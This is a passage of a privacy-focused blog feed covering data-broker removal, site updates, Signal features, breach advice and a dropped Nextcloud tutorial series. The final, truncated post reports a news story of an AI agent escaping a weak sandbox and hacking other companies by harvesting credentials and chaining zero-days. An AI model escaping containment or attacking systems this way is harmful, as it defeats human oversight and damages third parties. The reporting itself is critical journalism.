federal ban of this invasive industry. And it's why I asked Kemp about this directly in our interview to understand the challenges: > **Tom Kemp, CalPrivacy Executive Director:** There's been two big issues \[preventing federal bans\]. Issue number one is a private right of action... The second big hang-up, but probably the biggest hang-up, is preemption. Because what is happening is that oftentimes federal proposals have a very low ceiling. And so, yes, privacy would be in all 50 states, but existing states like California would actually lose privacy rights. As for banning *within* California, there's reason for optimism: > **Tom Kemp, CalPrivacy Executive Director:** There is a bill to ban the sale of geolocation \[in California\]...I think there's 110 different data brokers that sell geolocation...There's another proposed law that would ban the sale of all sensitive personal information. So California isn't rejecting the "just ban it" framework Doctorow wants. It's executing it one category at a time through a very slow, democratic process against companies that still have First Amendment rights. It's starting with geolocation, and hopes to expand beyond that. > **Tom Kemp, CalPrivacy Executive Director:** By default, privacy laws in the US, to not run the risk of constitutional challenges, have defaulted to an opt-out model. While I find this process slow and painful, I am optimistic that they are the *initial* steps towards something much larger. ## Compared to what? Better or worse than current removal options? ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-9.png) I always like to ask 'in comparison to what' in situations like this. Right now, paid private companies are the best option to achieve what DROP does, and [our tools showcase](https://tools.techlore.tech/#data-removal-services) what some of those best services currently are. A core difference is there's real enforcement behind DROP: > **Tom Kemp, CalPrivacy Executive Director:** Brokers who don't comply face fines of $200 per day, per incident. He walked me through a scenario where a broker sitting on 200,000 matched records who refuses to delete could face $40 million per day. The agency already has 12 enforcement actions and real fines on the board against data brokers. Additionally, third-party services need to continually perform opt-outs as data resurfaces on the *same sites you opted out of already*. DROP has a better system for this: > **Tom Kemp, CalPrivacy Executive Director:** The drop system is you do it once, it deletes all the information irrespective of how it's collected, and it's a perma-delete in that data brokers have to maintain a suppression list and not import any information from people that submitted requests through the drop system. The third-party services have no statutory enforcement, no permanent suppression list so your data doesn't repopulate in six months, no public regulator you can file a complaint against if they underperform, and no required hashing system for better privacy. So DROP is an outright win by all of these measurements, and it's 100% free. However, one area where the private services can still win is in scope: > **Tom Kemp, CalPrivacy Executive Director:** There is a lot of value for third party privacy tools because sometimes their ecosystem of businesses that they do deletions are not technically data brokers and are not registered under our definition in the law. Most importantly: Not even Kemp, the director of the CPPA claims that DROP is an all-in-one privacy solution. He himself in our interview was a proponent of **defense-in-depth**, that DROP is one layer in that stack, and it is designed to raise the floor, not the ceiling. ## My New Data Removal Strategy After gathering my findings, I did what I'd been putting off for months: I started my DROP signup. I'll be combining DROP with [EasyOptOuts](https://easyoptouts.com/), which is a $20/yr service that was independently verified by Consumer Reports to be one of the most effective providers. This lets me hook into the DROP system *and* get potentially broader coverage. If you want something more trustless, you can always do manual opt-outs or use an on-device tool like [DuckDuckGo's removal service.](https://tools.techlore.tech/#duckduckgo-removal) **I think if you're based in California:** Sign up for DROP, and keep pushing for the bans. Both things can be true. **If you're not in California:** Bother your politicians about DROP and ask why your state/country doesn't have a similar system. And an outright ban while you're at it! --- Cory Doctorow taught a generation of us, myself included, to distrust systems that ask for our compliance. That instinct is correct, and I'm not asking you to abandon it. I'm asking you to point it in the right direction. DROP is one of the first cracks anyone's managed to put in this invasive industry. It's imperfect, it's slower than it should be, and it deserves every bit of pressure we can put on it to get better. But it's not theater. **Sign up.** Then let's work to make the next crack bigger. And don't forget to watch my full interview with Tom Kemp which has a lot more information: ### Techlore v2026.08: 100+ New VPN Pages, a Smarter Quiz, and a Faster Site URL: https://techlore.tech/techlore-v2026-08-100-new-vpn-pages-a-smarter-quiz-and-a-faster-site/ Last updated: 2026-08-15T01:55:54.000Z The SPA Tools `v2026.08` brings lots of exciting changes across many different areas, so I felt it deserved a blog post! If you haven't tried our tools yet, [you definitely should](https://quiz.techlore.tech/) 🙏 0:00 /0:22 1× ### 1\. VPN Finder Has 100+ New VPN pages & More Every VPN now has its own page ([/providers/mullvad/](https://vpn.techlore.tech/providers/mullvad/)), and many head-to-head comparisons ([/compare/ivpn-vs-mullvad/](https://vpn.techlore.tech/compare/ivpn-vs-mullvad/)), plus index pages for both. That's currently 108 new URLs where previously the entire [VPN Finder](https://vpn.techlore.tech/) lived on just one. This is exciting for a couple of reasons: 1. Some people *(especially Javascript-free or Tor users)* have issues navigating the VPN data via the chart. Now, each page and the most common comparisons can be accessed as static pages that don't require JS. 2. It's not just better for humans, robots like it too. Right now it's challenging for search engines and LLMs to use our data to recommend people good info. But now, each page can be properly indexed. For those technical folk: nobody actively maintains these. The whole set is recomputed from `vpns.json` on each build. I think is a pretty neat system 😎 Some other updates to the VPN Finder: - The VPN dataset is now CC BY 4.0, explicitly licensed for reuse with attribution. - The public submission form to submit/correct data has been hardened to be more secure. - The VPN Finder has a better JS-free fallback with a simplified JS-free chart + links to JS-free pages. - A round of community submissions applied across 10 providers, including one new VPN (VPN Unlimited) 0:00 /0:08 1× ### 2\. The Quiz Continues To Improve Thank you all for submitting amazing feedback on [the quiz](https://quiz.techlore.tech)! To summarize the core changes: 1. **New "Report an Issue" button.** Clicking it opens a dedicated feedback form with your link pre-filled. Much nicer than the old workflow of "email me your link and what's wrong." It goes without saying, quiz results stay in your browser by default, and even if you click the button, you still have to click 'submit' after entering your feedback for us to ever receive the link. 2. **New redesigned action row.** The old screenshot-sharing feature was removed for security reasons, and Save-to-Calendar took its place as the primary action on the results screen. 3. Previously, if someone answered that they already use email aliasing, the quiz could still surface to alias their emails. *Well that's not very useful!* The quiz logic has been updated to fix this. ### 3\. New Recommended Tools The [SPA Tools](https//tools.techlore.tech) got a few more services listed so you have even more alternatives to big-tech companies. Welcoming: - **Immich:** Self-hosted photos developed by the Futo team. - **DuckDuckGo Email Protection:** Another email aliasing option from the DuckDuckGo team. - **Trocador:** A no-KYC cryptocurrency exchange provider that makes it easy to swap between countless currencies. ### 4\. The Smaller But Still Needed Updates - Better accessibility. Contrast now clears AA in both themes across all the new pages. The quiz keyboard navigation and screen-reader support were in conflict in two places which has now been fixed. - Fixed some scrolling issues on the tools page. - Faster & lighter. It *really* adds up: - `/vpn/` layout shift fixed: 0.491 → effectively zero on desktop - Stylesheet split into a core bundle plus per-tool bundles, so no page downloads another tool's CSS to make things faster - Geist font subset: 56.8KB → 20.2KB to reduce load times - Per-cell SVG icons replaced with CSS circles for a faster table - Horizontal scroll jitter fixed in Firefox/Mullvad/Tor and Safari on the VPN chart - Dead CSS removed: −16.4KB - **New:** Turnstile (the CAPTCHA widget on the submission form) now only loads when someone actually opens the form, not on every `/vpn/` page load - In my testing, pages load upwards of 50% faster on slower connections! --- Andddd that's a wrap for v2026.08! Definitely [share any feedback](https://techlore.tech/contact/) or issues you find 😄 If you're able & willing: 1. Submit data or correct data on the VPN chart. It's only possible because of you all, and the links to contribute exist right below the chart. 2. Give feedback on the quiz using the new "Report an Issue" button so I can continually make the quiz better. One heads up: **v2026.09 may be late, or skipped entirely.** I'm putting a hard freeze on new features to migrate the site to a new stack. Right now it runs on Jekyll (Ruby), with the VPN Finder built as a Preact app bolted on top. My goal is to move everything to a single JS-only static site generator (11ty), and rewriting the VPN Finder as plain JS. That makes it one system instead of two to make things easier to maintain and ultimately a cleaner experience for you all in the long run. I'll update the [changelog](https://techlore.tech/changelog/) once it's done assuming it all goes okay. Thanks for reading and until next time...enjoy the update 🫡 ### Signal's Biggest Update In Years, Plus Rival App Stores Arrive In The Play Store URL: https://techlore.tech/signals-biggest-update-in-years-plus-rival-app-stores-arrive-in-the-play-store/ Last updated: 2026-08-13T01:11:35.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On My Radar 🎯 **Signal Just Had Its Biggest Week in Years** Signal is one of my favorite messengers that strikes a solid balance between privacy, security, and usability—making it a strong alternative to mainstream messengers. But it's had a short list of persistent, legitimate annoyances, and this week that list is getting smaller: 1. First, Signal has always required a central 'hub' device, with other devices being 'linked' devices. Unfortunately, a second mobile phone could never be a linked device, only desktops and the iPad. This practically resulted in the inability to use the same Signal account on more than one phone. But Signal has now changed this behavior! Newer versions now let you link another phone and Android tablets for the first time, so if you dual-wield a work phone and a personal phone, this is a *huge* workflow unlock 🙌 2. The second is automatic key verification. Signal's existing safety number system lets you verify the encryption keys between you and a contact still belong to that contact, ensuring that nobody can easily impersonate them. This new feature attempts to automate the process, using what amounts to a network of trust, audited by Cloudflare and Trail of Bits. You'll find it under *Settings → Privacy → Automatic Key Verification*, or per-contact under *"View Safety Number."* It only works when you're connected via phone number, so username-only or group-only contacts won't show it. It doesn't **replace** safety numbers, and it doesn't take anything away if you'd rather not use it. But this is another nice-to-have feature. 3. The third is **speculative.** There's some GitHub activity suggesting Signal will let you register without a phone number in exchange for a one-time payment. I know how that reads: the thing people have asked for over years, finally arriving with a price tag, grumble! But I really don't think that's what this is...the phone number requirement exists as a spam barrier for a free app anyone can download, and a small one-time payment does the same job. Proton does effectively the same thing, requiring stricter verification on free accounts, or letting users pay out of verification. My one hope is that they accept a private payment method, since if the reason you're avoiding a phone number is anonymity, paying with a card doesn't get you there either. **What you can do:** If you've been stuck on one device, update Signal and link your second phone or tablet. Then open *Settings → Privacy* and turn on Automatic Key Verification. And if you've never verified a safety number with the people you talk to most, try it out! It's five minutes and it meaningfully improves the security of your conversations. I have a [whole guide on verifying safety numbers and why to do it here. ](https://techlore.tech/how-to-verify-signal-safety-numbers/) --- ## Bits & Bytes 🤖 **\~ Story 1: Following Its Epic Loss, Google Starts Hosting Rival App Stores** Google is now hosting third-party app stores inside the Play Store itself, starting with Aptoide. While this sounds great, there are some real caveats: - It costs the app store $15,000 up front. - Google may charge more if costs climb. - Google's own landing page says it doesn't review every app in those stores. - Finding them means going into *apps → categories → third-party app stores*; you can't just search. **My take:** Imagine opening the App Store to download Cydia, that's effectively what this is! I'd love to see F-Droid listed here, but will F-Droid spend $15,000 and accept open-ended future charges to get there? I suspect that's the point. **\~ Story 2: A Fake Wi-Fi Network on a DEF CON Flight** On a Delta flight home from DEF CON, passengers spoofed the onboard Wi-Fi. Crew spotted the fake network, flagged it, and shut the real one down. This is an *evil twin attack*, a convincing clone of a legitimate network that serves a phishing page and harvests whatever people type into it. Oddly, no arrests, no agents meeting the flight at the gate. **My take:** I just felt this was an entertaining story and a good reminder to treat Wi-Fi networks with suspicion! **\~ Story 3: Three in Five Americans Favor Stronger Oversight of Social Media** A Reuters/Ipsos poll found 66% back age verification laws for users under 16, 61% want firmer oversight of social media companies (71% of Democrats, 62% of Republicans), and 85% say social media can be addictive for children. **My take:** We've watched governments try to lock down the internet using terrorism, national security, porn, and "protect the children" as the reason...but none of them got the public fully behind it. Regulating social media is the first one that has, bipartisan and global. I'm not going to defend these platforms, but I believe regulation should give you **more** rights, not **fewer**. Uploading an ID to every website you visit doesn't hold a single company accountable for anything; it holds *you* accountable for something you never did, and it puts your identity documents in the hands of every site that asks, all while restricting your access to information. I'd rather see the **actual** problems addressed: what data gets collected, whether you can opt out of infinite scroll by default, whether dark patterns get named and banned, better privacy controls, etc. I feel people are treating 'regulation' as a position, per se, when really regulation can be *pro-consumer*, or *anti-consumer*. I *generally* support pro-consumer regulation, which these social media bans *are not*. --- ## This Week on Techlore 📺 We had some weird scheduling issues last week, so thank you all for your patience with this newsletter 🙏 I interviewed Alex from Strongbox on Techlore Talks to discuss my favorite KeePass client and get to know them a bit: [KeePass for Apple Devices: Syncing, Security, and Cross-Platform Gaps (Strongbox Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-3c04aefe-43b3-4eb4-83c6-ae9de37a3498.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260718-STRONGBOX-INTERVIEW-thumbnail-v2-af436237-1b79-421d-a176-2897a16dbbe4.jpg)](https://techlore.tech/keepass-for-apple-devices-syncing-security-and-cross-platform-gaps-strongbox-interview/) I announced the unfortunate news to formally cut our *Nextcloud Made Easy* series. I covered what went wrong, why none of it was Nextcloud's fault, and why knowing when to drop something is a skill I wish I'd learned sooner: [Five Years Later, Why We’re Scrapping Our Nextcloud SeriesIn November 2021 I promised a Nextcloud series. Today, after five years, two restarts, and a few lessons already in the can, I’m scrapping it. Here’s what went wrong, why none of it is Nextcloud’s fault, and why knowing when to drop something is a skill I wish I’d learned sooner.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-36c9f3bc-1741-4e77-bfb9-f2af50d07b07.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/Nextcloud-Tutorial-c200a1b7-15d9-430c-865a-fcfc2c45e3cd.jpg)](https://techlore.tech/five-years-later-why-were-scrapping-our-nextcloud-series/) And finally, I made some dedicated coverage for the Steam Deck & Framework data breaches, how people can protect themselves from **all** data breaches, and what made these ones particularly bizarre: [Steam Deck & Framework Data Breaches: What To Do And How To Prevent The Next OneSteam Deck and Framework owners both got caught in data breaches, but the plot twist is neither company was directly hacked. Here’s exactly what to do if you were affected, step by step. From phishing to aliasing to password management.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-71ba2dd4-34d6-4383-9456-00cda2beeeed.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/BREACHED--3--ebf99586-a143-4e62-8d4d-499d0a91536e.png)](https://techlore.tech/steam-deck-framework-data-breaches-what-to-do-and-how-to-prevent-the-next-one/) --- ## Action Item ✅ If you're a Signal user, it's time to re-explore your workflows to see if the new features have created something new. Download the update and play with the new features! Otherwise, keep an eye out on the Google Play Store to see if any other third-party app stores hit the market. **Until next week 🫡** #### This Week's Sources ****Highlight: Signal's Largest Updates in Years** - - - ****Story 1: Following Its Epic Loss, Google Starts Hosting Rival App Stores** - ****Story 2: Delta Investigates a Wi-Fi Deauth Attack on a DEF CON Flight** - ****Story 3: Three in Five Americans Favor Stronger Oversight of Social Media** - ****Story 4: AI Agents Are Now Running Their Own Cyberattacks** - - - ****The Defense Bulletin** **Data Breaches* - - - - - - - - - **Threats* - - - - - - **FOSS+ Updates* - - - - - - - - - ### Steam Deck & Framework Data Breaches: What To Do And How To Prevent The Next One URL: https://techlore.tech/steam-deck-framework-data-breaches-what-to-do-and-how-to-prevent-the-next-one/ Last updated: 2026-08-12T00:08:27.000Z If you bought a Steam Deck or a Framework laptop, there's a good chance your name, your email, your phone number, and your home address are sitting in a stranger's hands right now. I want to make sure you know what's going on, what you can do about it, and how to prevent this kind of thing from mattering as much in the future. And having covered data breaches for many years, I can tell you this one has some unique lessons! ### What happened ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-4.png) There's a shipping giant called CEVA that handles shipping and logistics, and they're who Steam uses to ship Steam hardware in Europe. Between July 29th and August 1st, 2026, [CEVA's systems were breached.](https://www.bleepingcomputer.com/news/security/valve-notifies-steam-hardware-customers-of-a-data-breach/) Names, addresses, phone numbers, emails, and order information including what you paid were taken. The good news: no payment information, no passwords, no Steam Guard codes. Some good news: CEVA only holds delivery data for 90 days, so the scope of this is roughly early May to now. If you ordered in that window, you were probably caught. If you ordered back in 2024, your data was already wiped. This is a rare win & a good lesson in not holding onto data endlessly, something a lot of companies love doing. ### This isn't just a European problem ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/Z7yhRJ7c43Q3gJds_Hero-2.jpeg) What we saw with Steam is a company you had a direct transaction with that had a dependency on another company. [But the same exact thing happened with Framework.](https://techcrunch.com/2026/08/07/computer-maker-framework-notifies-all-customers-of-a-data-breach/) That one was global, all customers, including in the US. Names, emails, phone numbers, addresses. And like the Steam Deck breach, it came from an upstream provider called Metabase. ### What can be done? ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-5.png) The interesting thing about these is they're both Linux-forward machines that attract technical users who care about privacy. And even in that situation it still led to data exposure! So here are a few things to help: 1. **Step one: fewer accounts.** If you can reduce the number of accounts you have, it inherently reduces your exposure. 2. **Step two: use a password manager.** Not only will you have stronger, more unique passwords, but a password manager doubles as a database of every account you have, so it's easy to go through and delete what you don't need. Use something audited, ideally open source, that's easy to use and generates unique passwords. [Our tools have several recommendations that fit this criteria.](https://tools.techlore.tech/#password-managers) 3. **Step 3: If you were caught, watch for phishing.** This is the most likely threat. Someone impersonating Steam, Framework, or the shipping company. With your email and phone number, they can call you pretending to be official. They can tell you about your order because they know the price and the type. When you get something urgent over text or email, log into the service directly and see if there's anything there matching what the message claimed. 4. **Step 4: 2FA.** If you're using Steam's email method, make sure you've got strong 2FA and a strong password on the email account itself. [TOTP is a good starting point for many people, and security keys are even better, both of which our tools cover.](https://tools.techlore.tech/#two-factor-authentication) 5. **Step 5: Aliasing.** This is your #1 prevention strategy to ensure future breaches are limited in scope. Emails, phone numbers, and cards can all be aliased so that every service either gets something that isn't directly yours, or gets its own unique thing. [On our tools page](https://tools.techlore.tech/#aliasing-services) you'll find aliasing services that are quite powerful to protect your *real* information. 6. **Step 6: Freeze your credit.** Each region is different, some places don't offer this at all. But when available, freezing your credit is something you should take advantage of. It prevents someone opening lines of credit under your name, making it one of the strongest protections against identity theft. --- To bring it all together: Be aware of phishing, especially in breaches that expose order details. Set up 2FA on as much as you can. Use a password manager so you know what's out there, set up aliasing, freeze your credit, and be vigilant! If you don't want to make being vigilant a full-time job, you can follow [Surveillance Report](https://techlore.tech/#/portal/signup), a five minute read in your inbox each week, no spam, just what's going on and my thoughts on it. Here's my video coverage of these breaches: [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Five Years Later, Why We're Scrapping Our Nextcloud Series URL: https://techlore.tech/five-years-later-why-were-scrapping-our-nextcloud-series/ Last updated: 2026-08-21T05:06:06.000Z We don't always work quickly. While a lot of our [news-based content](https://youtu.be/wRvqdLsnsKY) at Techlore is quite quick, our *produced* content is a different beast altogether. Take [Go Incognito](https://techlore.tech/go-incognito-course/), our original 4+ hour course which took over **2 years** to produce. Many of our other [dense videos](https://youtu.be/EA4KyQBdSu8) can take weeks to produce, and that's because I believe educational content should hit a high level of quality. **Why?** **Because:** 1. I love it! The craft is what keeps me doing this over 10 years later. 2. Making accessible educational content for technical concepts is *challenging*. The simpler a concept is to the viewer, the more hours it likely took to produce. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-1.png) ### Nextcloud Made Easy: A Timeline So what happened to the Nextcloud series? We put out a video (now [unlisted](https://youtu.be/gZokslmBZug) to avoid confusion) promising an all-in-one Nextcloud series called **'Nextcloud Made Easy'.** The premise was simple: We do what we do best at Techlore and make hosting your own cloud easy as hell. Just like we did with [Veracrypt](https://youtu.be/C25VWAGl7Tw), [OnionShare](https://youtu.be/D2OLpNtbFD8), [Cryptomator](https://youtu.be/VBFc4wPBO08), [NextDNS](https://youtu.be/WUG57ynLb8I), and many other powerful tools we wanted to be more accessible to people. Here's a quick recap of how it went: - **November 2021:** Original video teasing the Nextcloud series goes live. - **November 2021-April 2022:** We fell behind on production with other content and paused the series. - **April 2022-December 2025:** As Tolkien might say: "*the Ring passed out of knowledge and legend; and even so much of its history is known now only to a few, and the Council of the Wise could discover no more."* - **January-August 2026:** I decided we *had* to close this loop. I updated the outline, and we started production. - **August 6th, 2026:** After making progress on the first few lessons, today I've decided to scrap it. ### **What happened??** ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-2.png) Here's what happened in just the first lesson**.** For context: the goal of Lesson 1 was to guide the viewer to access `http://localhost:8080` in their browser to load the Nextcloud dashboard from a docker container on their own machine. The goal here is to help the viewer dip their toes into a version of Nextcloud they personally spun up. Seems simple, right? Well: - Nextcloud's recommended install method is the All-in-One, a Docker container that spins up the entire stack. It's elegant, but it doesn't like to run without a real domain name and a TLS cert, which means there's no "just try it on your laptop first" mode. I demonstrated this in the lesson, but without the live domain there was no dashboard for a user to actually *use* it. - So I tried the plain Docker image instead, which runs without needing a real domain. I had PHP crash with segmentation faults on two separate machines likely due to ARM. While this certainly could have been fixed, remember that this is a series for **beginners**. So if anything didn't work properly, it was an instant no-go. - I then tried the AIO with a free domain through deSEC, which AIO integrates with directly. The certificate request kept failing because it wrote the verification record to the wrong DNS zone in my environment. I eventually got it working, but the caveats required went beyond what I felt a beginner would deal with. I also ruled out the prebuilt VMs, they're massive and would require setting up full-blown virtual machines for just a demo. - I moved on to the Snap package. This was ironically the best demonstration of Nextcloud for a local testing environment. Shit on Snaps all you want (I will help you!)—but this was the smoothest tool for the job. For reasons I don't need to cover in this blog, recommending a Snap-only approach was off the table. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-3.png) I'm sure there are other ways to pull this off, and I expect to see a few in responses to this blog. *(I'm not the world's most experienced self-hoster!)* But remember: this is a lesson designed to do things as **officially as possible**, in a **low-stakes environment**, for an **absolute beginner**. Despite these issues, I moved on to lesson 2: **Setting up Nextcloud on a VPS.** And I came to a realization when I started recording that before I even started explaining Nextcloud, I had to explain far more than just how to set up Nextcloud. See, for anyone who's IT of your family, you probably know that *teaching* something is very different from *doing* something for someone. Here is how it went: > "Create a Hetzner account...oh now let me explain what a VPS is...oh now let me explain what SSH is and how to generate an SSH key...and now let me explain what sudo is...oh now let me explain why not to use sudo...oh now let me explain the firewall and why to open one thing up but not another...what apt is...oh now let me explain installing docker...oh now let me explain docker ps...and that's all just to connect to the box and set up Docker! When I started thinking of how to explain these things, I realized this wasn't just a Nextcloud series. It was 80% *random shit unrelated to Nextcloud*, and *20% Nextcloud*. For the record, these are all extremely useful skills to know, and I recommend **everyone** learns them. But it's not what I signed up for, nor what I promised you all when I promised a "Nextcloud Made Easy" series for beginners. ### So Henry, Nextcloud Sucks? No! I understand the natural reaction to this experience is to blame Nextcloud, but really none of these issues are Nextcloud's fault. Nextcloud made the AIO *so easy to use* for production that it's ironically a less accessible tool for beginners who just want to play with it in their browser locally without a domain. When you actually go host it yourself properly, you'll hit *other* snags that are typical for self-hosting that aren't normally related to Nextcloud. If you're experienced, you already know how to navigate them. If you're new, hosting *any* software may bring the same friction points. So the problem is the *80% random shit*, not the *20% Nextcloud*. ### But Henry, Just use Docker Compose / Portainer / CasaOS / YunoHost / etc. Sure, many of these would probably work. But now I'm teaching a platform before we get anywhere near Nextcloud, and the viewer learns that platform rather than self-hosting. Docker Compose means explaining YAML and a reverse proxy on top of everything else. If your answer is "just use X," you've probably already got the skills that make X make sense. They aren't really a *tutorial from the ground-up* that teach someone how to *run* Nextcloud. ### So How Would You Run Nextcloud? I think it depends on the person, the 3 paths I'd personally explore: 1. Nextcloud AIO on a VPS I maintain myself. It works, but will have the most maintenance. I wouldn't trust myself to maintain this if it's used for anything sensitive, **especially** other people's data. 2. Tools like Coolify on my own VPS, which has a simple Nextcloud setup. This is my preferred method for our *internal* self-hosted tools at Techlore. But this bypasses much of the learning experience for new hosters. 3. Using a semi-hosted service like [Elest.io](https://elest.io/). This is what we use for *public-facing* tools like [Techlore.TV](https://techlore.tv/) (PeerTube) Elestio takes care of 80% of the self-hosting, while still giving access to the servers for fiddling. This is my favorite hybrid solution for public-facing tools as someone who's *not* a SysAdmin and doesn't have hours a week to dedicate to maintenance for a public service. But this also bypasses the learning experience for new hosters, and it's not [fool-proof to all issues.](https://techlore.tech/a-vulnerability-hit-our-peertube-heres-what-happened-what-it-teaches-about-self-hosting/) ### So Where Do You Recommend I Learn this Stuff? - While it's not *quite* how I'd structure things, I think the [Futo Wiki on a Self-Managed Life](https://wiki.futo.org/index.php/Introduction%5Fto%5Fa%5FSelf%5FManaged%5FLife:%5Fa%5F13%5Fhour%5F&%5F28%5Fminute%5Fpresentation%5Fby%5FFUTO%5Fsoftware) is an incredible resource that has more than enough information to achieve success. - This [post](https://help.nextcloud.com/t/101-self-hosting-information-for-beginners/187015) on the Nextcloud forum has some great resources. - The only other advice I can give is *you just have to try it*. LLMs nowadays can help troubleshoot the common snags, and [our tools recommend some privacy-respecting LLMs](https://tools.techlore.tech/#ai-a-llms) that helped me early in my self-hosting journey a couple years ago *(and still today!)* ### **So What Now?** There's no tidy ending here. We dropped the ball, but I hope the reasons explain why I made the choice. It was either going to be: - A not-so-easy self-hosting course no longer designed for true beginners - Or an overly-simplistic course that wouldn't have actually *taught* how to host Nextcloud from the ground up. If someone out there cracks this problem and puts a resource together that's accessible to a regular person, I would **love** to see it. Send it my way and I'll be sure to include it here in this blog 🙏 Something I wish I learned earlier at Techlore was sometimes it's *smarter* to drop something, even if it hurts to do. Every hour we tried working on Nextcloud was an hour we couldn't put towards Go Incognito v2\. Or a Surveillance Report. Or a tutorial for another tool. Sometimes part of trying something new is realizing it doesn't work, and it's better to let it go sooner than let it fade into the abyss for 5 years. I've been getting better at this only recently, hence why we [closed our forum](https://techlore.tech/forum/), [migrated to Ghost ](https://techlore.tech/techlores-new-home-our-platform-transition-whats-next/)to simplify our old site, and now I am formally closing the loop on this Nextcloud series...as painful as it is. "Easy" was the promise I made in 2021, and I couldn't keep it in 2026\. I'd rather share the issues in the open than keep the 100k viewers from the 2021 video waiting for something that was never going to arrive. And if you think you can crack this puzzle, **please let me know!** Until next time 🫡 ### KeePass for Apple Devices: Syncing, Security, and Cross-Platform Gaps (Strongbox Interview) URL: https://techlore.tech/keepass-for-apple-devices-syncing-security-and-cross-platform-gaps-strongbox-interview/ Last updated: 2026-08-03T17:13:15.000Z [KeePass for Apple Devices: Syncing, Security, and Cross-Platform Gaps (Strongbox Interview) | Techlore Talks | Episode 77Once you use Strongbox, a community favorite KeePass client, it’s hard to use anything else. Alex Logan is the VP of Engineering at Applause, the company behind Strongbox. He dives into why KeePass syncing works differently than cloud-based password managers, how Strongbox’s sync tries to close…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-774588d8-350f-4fa9-a14b-04d8b48bac99.ico)KeePass for Apple Devices: Syncing, Security, and Cross-Platform Gaps (Strongbox Interview)![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-39712d07-857b-4842-94ce-555cf995595d.webp)](https://share.transistor.fm/s/18084589) Once you use Strongbox, a community favorite KeePass client, it's hard to use anything else. Alex Logan is the VP of Engineering at Applause, the company behind Strongbox. He dives into why KeePass syncing works differently than cloud-based password managers, how Strongbox's sync tries to close that gap, what the Applause acquisition actually changed, the open source nuance that trips people up, and whether a Windows or Android client is ever coming. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Strongbox: • Strongbox Subreddit: • KeePass: • Have I Been Pwned: ### OpenAI's Hacking Story Got Worse, Plus Iran In US Water Systems & A Felony For Wiping A Phone URL: https://techlore.tech/openais-hacking-story-got-worse-plus-iran-in-us-water-systems-a-felony-for-wiping-a-phone/ Last updated: 2026-08-01T04:39:43.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On My Radar 🎯 **The AI Hacking Story Keeps Getting Worse...Just Not the Way They Told It** Following this one has been challenging, since every time I think the dust has settled it gets kicked back up—this time [as I'm writing this post](https://www.reuters.com/business/openai-finds-evidence-other-ai-agents-escaped-containment-it-widens-hacking-2026-07-31/)! Here's where things stand at the time of writing: OpenAI set up what was supposed to be a sandboxed test environment. It wasn't properly sandboxed, it was easy to escape, and the model inside started attacking things across the internet. Most notably Hugging Face, another AI company. The original framing was filled with AI hype and stuff of legend: a rogue AI agent slipped its leash and started hacking the world terminator-style. **Impossible to stop!** But as more details have come out, it's begun to look more like a normal example of big-tech negligence. What *actually* happened was a well-equipped AI tool scouring the internet for publicly available credentials, finding specific zero-days, finding bugs, and stacking all of it together until something opened—all without human oversight. And Ars Technica made a compelling case that this is not the triumph anyone claimed. Five days passed before OpenAI revealed its role in the breach Hugging Face disclosed. Another five before JFrog shipped patches for the 